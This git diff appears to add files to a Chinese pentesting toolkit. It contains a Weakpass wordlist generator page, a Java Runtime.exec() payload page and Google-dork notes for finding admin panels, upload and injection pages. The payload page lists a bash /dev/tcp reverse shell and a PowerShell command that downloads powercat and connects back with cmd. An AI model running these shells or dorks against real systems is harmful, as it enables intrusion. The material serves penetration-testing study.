3rem}}.section{padding:3rem 1.5rem}@media screen and (min-width:1024px){.section{padding:3rem 3rem}.section.is-medium{padding:9rem 4.5rem}.section.is-large{padding:18rem 6rem}}.footer{background-color:#fafafa;padding:3rem 1.5rem 6rem} \ No newline at end of file diff --git a/scripts/Weakpass_Generator/index.html b/scripts/Weakpass_Generator/index.html new file mode 100644 index 0000000..6c7ea7b --- /dev/null +++ b/scripts/Weakpass_Generator/index.html @@ -0,0 +1,678 @@ + + + + + +Weakpass password generator + + + + +
+
+ + + +
+
+
+ +
+

Weakpass Password Generator

+

弱密码生成器

+
+

+ 在这里你可以根据特定的输入数据生成一个弱密码词表。 + 例如,通过输入 Whoami.corp,您将获得一个可能的密码列表,如 Whoami.corp2018!Whoami.corp123 等。所有数据都将在客户端使用 JavaScript 进行处理。

+

+ 您可以使用 hashcat rules 生成单词表。默认情况下,生成器将使用默认规则,您可以在此处找到这些规则或单击“显示规则”。 +

+ + +

Github github.io 页面关注该项目。

+ + +
+ + + +
+ +

+ 以逗号、空格或换行符分隔

+
+ +
+
+ +
+
+ +
+ +
+ +
+ + +
+ + +
+ +
+ +
+
+
+
+ +
+
+ +

Copied!

+
+ +
+ + +
+ +
+ +
+
+ + + + + + +
+ +
+
+
+

+ Weakpass 2014-2021
+
+

+

Github项目地址:https://github.com/zzzteph/weakpass

+
+
+ +
+
+ + + + diff --git a/scripts/Weakpass_Generator/js/d0ae4a42e6.js b/scripts/Weakpass_Generator/js/d0ae4a42e6.js new file mode 100644 index 0000000..bebf41b --- /dev/null +++ b/scripts/Weakpass_Generator/js/d0ae4a42e6.js @@ -0,0 +1,2 @@ +window.FontAwesomeKitConfig = {"asyncLoading":{"enabled":false},"autoA11y":{"enabled":true},"baseUrl":"https://ka-f.fontawesome.com","baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"id":56575265,"license":"free","method":"js","minify":{"enabled":true},"token":"d0ae4a42e6","v4FontFaceShim":{"enabled":true},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":false},"version":"5.15.4"}; +!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(e)}function e(t,e,n){return e in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t}function n(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(t);e&&(o=o.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,o)}return n}function o(t){for(var o=1;ot.length)&&(e=t.length);for(var n=0,o=new Array(e);n2&&void 0!==arguments[2]?arguments[2]:function(){},r=e.document||r,i=u.bind(u,r,["fa","fab","fas","far","fal","fad","fak"]),f=Object.keys(t.iconUploads||{}).length>0;t.autoA11y.enabled&&n(i);var s=[{id:"fa-main",addOn:void 0}];t.v4shim&&t.v4shim.enabled&&s.push({id:"fa-v4-shims",addOn:"-v4-shims"}),t.v5FontFaceShim&&t.v5FontFaceShim.enabled&&s.push({id:"fa-v5-font-face",addOn:"-v5-font-face"}),t.v4FontFaceShim&&t.v4FontFaceShim.enabled&&s.push({id:"fa-v4-font-face",addOn:"-v4-font-face"}),f&&s.push({id:"fa-kit-upload",customCss:!0});var d=s.map((function(n){return new _((function(r,i){F(n.customCss?a(t):c(t,{addOn:n.addOn,minify:t.minify.enabled}),e).then((function(i){r(U(i,o(o({},e),{},{baseUrl:t.baseUrl,version:t.version,id:n.id,contentFilter:function(t,e){return P(t,e.baseUrl,e.version)}})))})).catch(i)}))}));return _.all(d)}function U(t,e){var n=e.contentFilter||function(t,e){return t},o=document.createElement("style"),r=document.createTextNode(n(t,e));return o.appendChild(r),o.media="all",e.id&&o.setAttribute("id",e.id),e&&e.detectingConflicts&&e.detectionIgnoreAttr&&o.setAttributeNode(document.createAttribute(e.detectionIgnoreAttr)),o}function k(t,e){e.autoA11y=t.autoA11y.enabled,"pro"===t.license&&(e.autoFetchSvg=!0,e.fetchSvgFrom=t.baseUrl+"/releases/"+("latest"===t.version?"latest":"v".concat(t.version))+"/svgs",e.fetchUploadedSvgFrom=t.uploadsUrl);var n=[];return t.v4shim.enabled&&n.push(new _((function(n,r){F(c(t,{addOn:"-v4-shims",minify:t.minify.enabled}),e).then((function(t){n(I(t,o(o({},e),{},{id:"fa-v4-shims"})))})).catch(r)}))),n.push(new _((function(n,r){F(c(t,{minify:t.minify.enabled}),e).then((function(t){var r=I(t,o(o({},e),{},{id:"fa-main"}));n(function(t,e){var n=e&&void 0!==e.autoFetchSvg?e.autoFetchSvg:void 0,o=e&&void 0!==e.autoA11y?e.autoA11y:void 0;void 0!==o&&t.setAttribute("data-auto-a11y",o?"true":"false");n&&(t.setAttributeNode(document.createAttribute("data-auto-fetch-svg")),t.setAttribute("data-fetch-svg-from",e.fetchSvgFrom),t.setAttribute("data-fetch-uploaded-svg-from",e.fetchUploadedSvgFrom));return t}(r,e))})).catch(r)}))),_.all(n)}function I(t,e){var n=document.createElement("SCRIPT"),o=document.createTextNode(t);return n.appendChild(o),n.referrerPolicy="strict-origin",e.id&&n.setAttribute("id",e.id),e&&e.detectingConflicts&&e.detectionIgnoreAttr&&n.setAttributeNode(document.createAttribute(e.detectionIgnoreAttr)),n}function L(t){var e,n=[],o=document,r=o.documentElement.doScroll,i=(r?/^loaded|^c/:/^loaded|^i|^c/).test(o.readyState);i||o.addEventListener("DOMContentLoaded",e=function(){for(o.removeEventListener("DOMContentLoaded",e),i=1;e=n.shift();)e()}),i?setTimeout(t,0):n.push(t)}function T(t){"undefined"!=typeof MutationObserver&&new MutationObserver(t).observe(document,{childList:!0,subtree:!0})}try{if(window.FontAwesomeKitConfig){var x=window.FontAwesomeKitConfig,M={detectingConflicts:x.detectConflictsUntil&&new Date<=new Date(x.detectConflictsUntil),detectionIgnoreAttr:"data-fa-detection-ignore",fetch:window.fetch,token:x.token,XMLHttpRequest:window.XMLHttpRequest,document:document},D=document.currentScript,N=D?D.parentElement:document.head;(function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};return"js"===t.method?k(t,e):"css"===t.method?C(t,e,(function(t){L(t),T(t)})):void 0})(x,M).then((function(t){t.map((function(t){try{N.insertBefore(t,D?D.nextSibling:null)}catch(e){N.appendChild(t)}})),M.detectingConflicts&&D&&L((function(){D.setAttributeNode(document.createAttribute(M.detectionIgnoreAttr));var t=function(t,e){var n=document.createElement("script");return e&&e.detectionIgnoreAttr&&n.setAttributeNode(document.createAttribute(e.detectionIgnoreAttr)),n.src=c(t,{baseFilename:"conflict-detection",fileSuffix:"js",subdir:"js",minify:t.minify.enabled}),n}(x,M);document.body.appendChild(t)}))})).catch((function(t){console.error("".concat("Font Awesome Kit:"," ").concat(t))}))}}catch(t){console.error("".concat("Font Awesome Kit:"," ").concat(t))}})); diff --git a/scripts/runtime-exec-payloads.html b/scripts/runtime-exec-payloads.html new file mode 100644 index 0000000..8499fb6 --- /dev/null +++ b/scripts/runtime-exec-payloads.html @@ -0,0 +1,56 @@ + + +java.lang.Runtime.exec() Payload + +

java.lang.Runtime.exec() Payload

+ + + +

+

+

+ + +Bash反弹命令: +

bash -i >& /dev/tcp/IP/端口 0>&1

+
+PowerShell反弹命令: +

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c IP -p 端口 -e cmd

+
+
+
+ \ No newline at end of file diff --git a/tips/images/202205091508042.png b/tips/images/202205091508042.png new file mode 100644 index 0000000..44c457b Binary files /dev/null and b/tips/images/202205091508042.png differ diff --git a/tips/images/202205091513716.png b/tips/images/202205091513716.png new file mode 100644 index 0000000..4bacfd0 Binary files /dev/null and b/tips/images/202205091513716.png differ diff --git a/tips/images/202205091525438.png b/tips/images/202205091525438.png new file mode 100644 index 0000000..ae26d64 Binary files /dev/null and b/tips/images/202205091525438.png differ diff --git a/tips/images/202205261701678.png b/tips/images/202205261701678.png new file mode 100644 index 0000000..1b6c94b Binary files /dev/null and b/tips/images/202205261701678.png differ diff --git a/tips/images/202205261702163.png b/tips/images/202205261702163.png new file mode 100644 index 0000000..84bd823 Binary files /dev/null and b/tips/images/202205261702163.png differ diff --git a/tips/images/202205261901055.png b/tips/images/202205261901055.png new file mode 100644 index 0000000..cb073f1 Binary files /dev/null and b/tips/images/202205261901055.png differ diff --git a/tips/images/202205261904148.png b/tips/images/202205261904148.png new file mode 100644 index 0000000..05465f6 Binary files /dev/null and b/tips/images/202205261904148.png differ diff --git a/tips/images/202205261905876.png b/tips/images/202205261905876.png new file mode 100644 index 0000000..0a24845 Binary files /dev/null and b/tips/images/202205261905876.png differ diff --git a/tips/images/202205261909529.png b/tips/images/202205261909529.png new file mode 100644 index 0000000..2ce8553 Binary files /dev/null and b/tips/images/202205261909529.png differ diff --git a/tips/images/202205261909679.png b/tips/images/202205261909679.png new file mode 100644 index 0000000..e09a000 Binary files /dev/null and b/tips/images/202205261909679.png differ diff --git a/tips/images/202205261913186.png b/tips/images/202205261913186.png new file mode 100644 index 0000000..4d0cca3 Binary files /dev/null and b/tips/images/202205261913186.png differ diff --git a/tips/images/202205261914178.png b/tips/images/202205261914178.png new file mode 100644 index 0000000..f67dd85 Binary files /dev/null and b/tips/images/202205261914178.png differ diff --git a/tips/images/202205261915497.png b/tips/images/202205261915497.png new file mode 100644 index 0000000..8db7090 Binary files /dev/null and b/tips/images/202205261915497.png differ diff --git a/tips/images/202205261918483.png b/tips/images/202205261918483.png new file mode 100644 index 0000000..ca4eccc Binary files /dev/null and b/tips/images/202205261918483.png differ diff --git a/tips/images/202205261918665.png b/tips/images/202205261918665.png new file mode 100644 index 0000000..60bdbb7 Binary files /dev/null and b/tips/images/202205261918665.png differ diff --git a/tips/images/202205261921270.png b/tips/images/202205261921270.png new file mode 100644 index 0000000..1571d6f Binary files /dev/null and b/tips/images/202205261921270.png differ diff --git a/tips/images/202205261922615.png b/tips/images/202205261922615.png new file mode 100644 index 0000000..4333666 Binary files /dev/null and b/tips/images/202205261922615.png differ diff --git a/tips/images/202205261925172.png b/tips/images/202205261925172.png new file mode 100644 index 0000000..ee29055 Binary files /dev/null and b/tips/images/202205261925172.png differ diff --git a/tips/images/202205261932310.png b/tips/images/202205261932310.png new file mode 100644 index 0000000..96c76a8 Binary files /dev/null and b/tips/images/202205261932310.png differ diff --git a/tips/images/202205261933974.png b/tips/images/202205261933974.png new file mode 100644 index 0000000..b9f0492 Binary files /dev/null and b/tips/images/202205261933974.png differ diff --git a/tips/images/202205261935858.png b/tips/images/202205261935858.png new file mode 100644 index 0000000..56f9b0a Binary files /dev/null and b/tips/images/202205261935858.png differ diff --git a/tips/images/202205261938216.png b/tips/images/202205261938216.png new file mode 100644 index 0000000..ead6c6d Binary files /dev/null and b/tips/images/202205261938216.png differ diff --git a/tips/images/202205261940527.png b/tips/images/202205261940527.png new file mode 100644 index 0000000..d8e16cc Binary files /dev/null and b/tips/images/202205261940527.png differ diff --git a/tips/images/202205261949206.png b/tips/images/202205261949206.png new file mode 100644 index 0000000..4cca8f4 Binary files /dev/null and b/tips/images/202205261949206.png differ diff --git a/tips/images/202205261951182.png b/tips/images/202205261951182.png new file mode 100644 index 0000000..9fcbbcb Binary files /dev/null and b/tips/images/202205261951182.png differ diff --git a/tips/images/202205261956521.png b/tips/images/202205261956521.png new file mode 100644 index 0000000..9e4a3dd Binary files /dev/null and b/tips/images/202205261956521.png differ diff --git a/tips/images/202205270847820.png b/tips/images/202205270847820.png new file mode 100644 index 0000000..e1ac31a Binary files /dev/null and b/tips/images/202205270847820.png differ diff --git a/tips/images/202205270855472.png b/tips/images/202205270855472.png new file mode 100644 index 0000000..3ddec48 Binary files /dev/null and b/tips/images/202205270855472.png differ diff --git a/tips/images/202205270857265.png b/tips/images/202205270857265.png new file mode 100644 index 0000000..fed1a18 Binary files /dev/null and b/tips/images/202205270857265.png differ diff --git a/tips/images/202205270858477.png b/tips/images/202205270858477.png new file mode 100644 index 0000000..f327124 Binary files /dev/null and b/tips/images/202205270858477.png differ diff --git a/tips/images/202205270900839.png b/tips/images/202205270900839.png new file mode 100644 index 0000000..07d842b Binary files /dev/null and b/tips/images/202205270900839.png differ diff --git a/tips/images/202205270927923.png b/tips/images/202205270927923.png new file mode 100644 index 0000000..9005db7 Binary files /dev/null and b/tips/images/202205270927923.png differ diff --git a/tips/images/202205270931141.png b/tips/images/202205270931141.png new file mode 100644 index 0000000..202a461 Binary files /dev/null and b/tips/images/202205270931141.png differ diff --git a/tips/images/202205270932856.png b/tips/images/202205270932856.png new file mode 100644 index 0000000..6a1a864 Binary files /dev/null and b/tips/images/202205270932856.png differ diff --git a/tips/images/202205270935961.png b/tips/images/202205270935961.png new file mode 100644 index 0000000..35672c6 Binary files /dev/null and b/tips/images/202205270935961.png differ diff --git a/tips/images/202205270936872.png b/tips/images/202205270936872.png new file mode 100644 index 0000000..407f6d9 Binary files /dev/null and b/tips/images/202205270936872.png differ diff --git a/tips/images/202205270946813.png b/tips/images/202205270946813.png new file mode 100644 index 0000000..c0c091e Binary files /dev/null and b/tips/images/202205270946813.png differ diff --git a/tips/images/202205270950182.png b/tips/images/202205270950182.png new file mode 100644 index 0000000..93fb574 Binary files /dev/null and b/tips/images/202205270950182.png differ diff --git a/tips/images/202205270950223.png b/tips/images/202205270950223.png new file mode 100644 index 0000000..b097a2d Binary files /dev/null and b/tips/images/202205270950223.png differ diff --git a/tips/images/202205270959676.png b/tips/images/202205270959676.png new file mode 100644 index 0000000..bd7eca9 Binary files /dev/null and b/tips/images/202205270959676.png differ diff --git a/tips/images/202205271002159.png b/tips/images/202205271002159.png new file mode 100644 index 0000000..2132292 Binary files /dev/null and b/tips/images/202205271002159.png differ diff --git a/tips/images/202205271011302.png b/tips/images/202205271011302.png new file mode 100644 index 0000000..c67a756 Binary files /dev/null and b/tips/images/202205271011302.png differ diff --git a/tips/images/202205271013133.png b/tips/images/202205271013133.png new file mode 100644 index 0000000..acfc1a8 Binary files /dev/null and b/tips/images/202205271013133.png differ diff --git a/tips/images/202205271016580.png b/tips/images/202205271016580.png new file mode 100644 index 0000000..04aa85c Binary files /dev/null and b/tips/images/202205271016580.png differ diff --git a/tips/images/202205271016611.png b/tips/images/202205271016611.png new file mode 100644 index 0000000..acb2423 Binary files /dev/null and b/tips/images/202205271016611.png differ diff --git a/tips/images/202205271121046.png b/tips/images/202205271121046.png new file mode 100644 index 0000000..e9045a4 Binary files /dev/null and b/tips/images/202205271121046.png differ diff --git a/tips/images/202205271122178.png b/tips/images/202205271122178.png new file mode 100644 index 0000000..d19f76b Binary files /dev/null and b/tips/images/202205271122178.png differ diff --git a/tips/images/202205271124553.png b/tips/images/202205271124553.png new file mode 100644 index 0000000..a259225 Binary files /dev/null and b/tips/images/202205271124553.png differ diff --git a/tips/images/202205271126466.png b/tips/images/202205271126466.png new file mode 100644 index 0000000..77216f2 Binary files /dev/null and b/tips/images/202205271126466.png differ diff --git a/tips/images/202205271736471.png b/tips/images/202205271736471.png new file mode 100644 index 0000000..733f93a Binary files /dev/null and b/tips/images/202205271736471.png differ diff --git a/tips/images/202205271737599.png b/tips/images/202205271737599.png new file mode 100644 index 0000000..b44a17b Binary files /dev/null and b/tips/images/202205271737599.png differ diff --git a/tips/images/202205271739076.png b/tips/images/202205271739076.png new file mode 100644 index 0000000..b6ab85e Binary files /dev/null and b/tips/images/202205271739076.png differ diff --git a/tips/images/202205271740284.png b/tips/images/202205271740284.png new file mode 100644 index 0000000..cc867c3 Binary files /dev/null and b/tips/images/202205271740284.png differ diff --git a/tips/images/202205271742310.png b/tips/images/202205271742310.png new file mode 100644 index 0000000..5fb0047 Binary files /dev/null and b/tips/images/202205271742310.png differ diff --git a/tips/images/202205271800602.png b/tips/images/202205271800602.png new file mode 100644 index 0000000..0d4072c Binary files /dev/null and b/tips/images/202205271800602.png differ diff --git a/tips/images/202205271801624.png b/tips/images/202205271801624.png new file mode 100644 index 0000000..96bac34 Binary files /dev/null and b/tips/images/202205271801624.png differ diff --git a/tips/images/202205271804004.png b/tips/images/202205271804004.png new file mode 100644 index 0000000..33420b5 Binary files /dev/null and b/tips/images/202205271804004.png differ diff --git a/tips/images/202205271807146.png b/tips/images/202205271807146.png new file mode 100644 index 0000000..0ba5fd6 Binary files /dev/null and b/tips/images/202205271807146.png differ diff --git a/tips/images/202205271815246.png b/tips/images/202205271815246.png new file mode 100644 index 0000000..98184de Binary files /dev/null and b/tips/images/202205271815246.png differ diff --git a/tips/images/202205271824223.png b/tips/images/202205271824223.png new file mode 100644 index 0000000..75934a8 Binary files /dev/null and b/tips/images/202205271824223.png differ diff --git a/tips/images/202205271827287.png b/tips/images/202205271827287.png new file mode 100644 index 0000000..95791cb Binary files /dev/null and b/tips/images/202205271827287.png differ diff --git a/tips/images/202205271850186.png b/tips/images/202205271850186.png new file mode 100644 index 0000000..d3551c5 Binary files /dev/null and b/tips/images/202205271850186.png differ diff --git a/tips/images/202205271852105.png b/tips/images/202205271852105.png new file mode 100644 index 0000000..efa808d Binary files /dev/null and b/tips/images/202205271852105.png differ diff --git a/tips/images/202205271854112.png b/tips/images/202205271854112.png new file mode 100644 index 0000000..acb27de Binary files /dev/null and b/tips/images/202205271854112.png differ diff --git a/tips/images/202205271856578.png b/tips/images/202205271856578.png new file mode 100644 index 0000000..6569407 Binary files /dev/null and b/tips/images/202205271856578.png differ diff --git a/tips/images/202205271902073.png b/tips/images/202205271902073.png new file mode 100644 index 0000000..39d3026 Binary files /dev/null and b/tips/images/202205271902073.png differ diff --git a/tips/images/202205301154200.png b/tips/images/202205301154200.png new file mode 100644 index 0000000..eb63eef Binary files /dev/null and b/tips/images/202205301154200.png differ diff --git a/tips/images/202205301154538.png b/tips/images/202205301154538.png new file mode 100644 index 0000000..b5f2019 Binary files /dev/null and b/tips/images/202205301154538.png differ diff --git a/tips/images/202205301155110.png b/tips/images/202205301155110.png new file mode 100644 index 0000000..143138c Binary files /dev/null and b/tips/images/202205301155110.png differ diff --git a/tips/images/202205301156409.png b/tips/images/202205301156409.png new file mode 100644 index 0000000..3206461 Binary files /dev/null and b/tips/images/202205301156409.png differ diff --git a/tips/images/202205301157438.png b/tips/images/202205301157438.png new file mode 100644 index 0000000..fdbc326 Binary files /dev/null and b/tips/images/202205301157438.png differ diff --git a/tips/images/202205301349630.png b/tips/images/202205301349630.png new file mode 100644 index 0000000..0d1a6e2 Binary files /dev/null and b/tips/images/202205301349630.png differ diff --git a/tips/images/202205301352552.png b/tips/images/202205301352552.png new file mode 100644 index 0000000..6c916f0 Binary files /dev/null and b/tips/images/202205301352552.png differ diff --git a/tips/images/202205301354403.png b/tips/images/202205301354403.png new file mode 100644 index 0000000..cfdeea6 Binary files /dev/null and b/tips/images/202205301354403.png differ diff --git a/tips/images/202205301355884.png b/tips/images/202205301355884.png new file mode 100644 index 0000000..0a1374a Binary files /dev/null and b/tips/images/202205301355884.png differ diff --git a/tips/images/202205301400718.png b/tips/images/202205301400718.png new file mode 100644 index 0000000..d9180bd Binary files /dev/null and b/tips/images/202205301400718.png differ diff --git a/tips/images/202205301413445.png b/tips/images/202205301413445.png new file mode 100644 index 0000000..01c569e Binary files /dev/null and b/tips/images/202205301413445.png differ diff --git a/tips/images/202205301414456.png b/tips/images/202205301414456.png new file mode 100644 index 0000000..890b1e1 Binary files /dev/null and b/tips/images/202205301414456.png differ diff --git a/tips/images/202205301417844.png b/tips/images/202205301417844.png new file mode 100644 index 0000000..ec5f1c6 Binary files /dev/null and b/tips/images/202205301417844.png differ diff --git a/tips/images/202205301425472.png b/tips/images/202205301425472.png new file mode 100644 index 0000000..1b2cf87 Binary files /dev/null and b/tips/images/202205301425472.png differ diff --git a/tips/images/202205301430315.png b/tips/images/202205301430315.png new file mode 100644 index 0000000..6491261 Binary files /dev/null and b/tips/images/202205301430315.png differ diff --git a/tips/images/202205301450337.png b/tips/images/202205301450337.png new file mode 100644 index 0000000..22ef644 Binary files /dev/null and b/tips/images/202205301450337.png differ diff --git a/tips/images/202205301453694.png b/tips/images/202205301453694.png new file mode 100644 index 0000000..5caad5e Binary files /dev/null and b/tips/images/202205301453694.png differ diff --git a/tips/images/202205301454631.png b/tips/images/202205301454631.png new file mode 100644 index 0000000..cf3297b Binary files /dev/null and b/tips/images/202205301454631.png differ diff --git a/tips/images/202205301456618.png b/tips/images/202205301456618.png new file mode 100644 index 0000000..cab47ed Binary files /dev/null and b/tips/images/202205301456618.png differ diff --git a/tips/images/202205301526558.png b/tips/images/202205301526558.png new file mode 100644 index 0000000..f64bed2 Binary files /dev/null and b/tips/images/202205301526558.png differ diff --git a/tips/images/202205301558330.png b/tips/images/202205301558330.png new file mode 100644 index 0000000..ab56872 Binary files /dev/null and b/tips/images/202205301558330.png differ diff --git a/tips/images/202210081129886.png b/tips/images/202210081129886.png new file mode 100644 index 0000000..805fc1a Binary files /dev/null and b/tips/images/202210081129886.png differ diff --git "a/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124103813576.png" "b/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124103813576.png" new file mode 100644 index 0000000..4820242 Binary files /dev/null and "b/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124103813576.png" differ diff --git "a/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124104222437.png" "b/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124104222437.png" new file mode 100644 index 0000000..8d56d1b Binary files /dev/null and "b/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124104222437.png" differ diff --git "a/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124105107971.png" "b/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124105107971.png" new file mode 100644 index 0000000..4a6ea6f Binary files /dev/null and "b/tips/images/CobaltStrike\346\265\201\351\207\217\345\210\206\346\236\220/image-20231124105107971.png" differ diff --git "a/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091032518.png" "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091032518.png" new file mode 100644 index 0000000..9b70e63 Binary files /dev/null and "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091032518.png" differ diff --git "a/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091034381.png" "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091034381.png" new file mode 100644 index 0000000..b392575 Binary files /dev/null and "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091034381.png" differ diff --git "a/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091042813.png" "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091042813.png" new file mode 100644 index 0000000..f765f10 Binary files /dev/null and "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091042813.png" differ diff --git "a/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091045328.png" "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091045328.png" new file mode 100644 index 0000000..19446a5 Binary files /dev/null and "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091045328.png" differ diff --git "a/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091046532.png" "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091046532.png" new file mode 100644 index 0000000..1441bb7 Binary files /dev/null and "b/tips/images/Webshell\346\265\201\351\207\217\345\210\206\346\236\220/202211091046532.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124162353785.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124162353785.png" new file mode 100644 index 0000000..8673bb5 Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124162353785.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163031668.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163031668.png" new file mode 100644 index 0000000..681855b Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163031668.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163506452.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163506452.png" new file mode 100644 index 0000000..72bfd85 Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163506452.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163603784.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163603784.png" new file mode 100644 index 0000000..be707a2 Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163603784.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163743384.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163743384.png" new file mode 100644 index 0000000..8744574 Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163743384.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163836496.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163836496.png" new file mode 100644 index 0000000..ed4223b Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124163836496.png" differ diff --git "a/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124164253796.png" "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124164253796.png" new file mode 100644 index 0000000..15ef26c Binary files /dev/null and "b/tips/images/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206/image-20231124164253796.png" differ diff --git "a/tips/images/\346\265\201\351\207\217\345\210\206\346\236\220-Webshell/image-20241022143146378.png" "b/tips/images/\346\265\201\351\207\217\345\210\206\346\236\220-Webshell/image-20241022143146378.png" new file mode 100644 index 0000000..f796e58 Binary files /dev/null and "b/tips/images/\346\265\201\351\207\217\345\210\206\346\236\220-Webshell/image-20241022143146378.png" differ diff --git "a/tips/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206.md" "b/tips/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206.md" new file mode 100644 index 0000000..80b4279 --- /dev/null +++ "b/tips/\344\277\241\346\201\257\346\224\266\351\233\206-\346\225\217\346\204\237\344\277\241\346\201\257\346\224\266\351\233\206.md" @@ -0,0 +1,379 @@ +# 信息收集-敏感信息收集 + +## Google + +- Google Hacking Database:https://www.exploit-db.com/google-hacking-database +- Google Hacking:https://pentest-tools.com/information-gathering/google-hacking +- Google Dork:https://cxsecurity.com/dorks/ + +### 基础语法 + +#### 管理后台地址 + +``` +site:target.com intext:管理 | 后台 | 后台管理 | 登陆 | 登录 | 用户名 | 密码 | 系统 | 账号 | login | system +site:target.com inurl:login | inurl:admin | inurl:manage | inurl:manager | inurl:admin_login | inurl:system | inurl:backend +site:target.com intitle:管理 | 后台 | 后台管理 | 登陆 | 登录 +``` + +#### 上传类漏洞地址 + +``` +site:target.com inurl:file +site:target.com inurl:upload +``` + +#### 注入页面 + +``` +site:target.com inurl:?id= +site:target.com inurl:php?id= +``` + +#### 编辑器页面 + +``` +site:target.com inurl:ewebeditor +``` + +#### 目录遍历漏洞 + +``` +site:target.com intitle: "index of" +``` + +#### URL 跳转 + +``` +site:target.com inurl:url= | inurl:return= | inurl:next= | 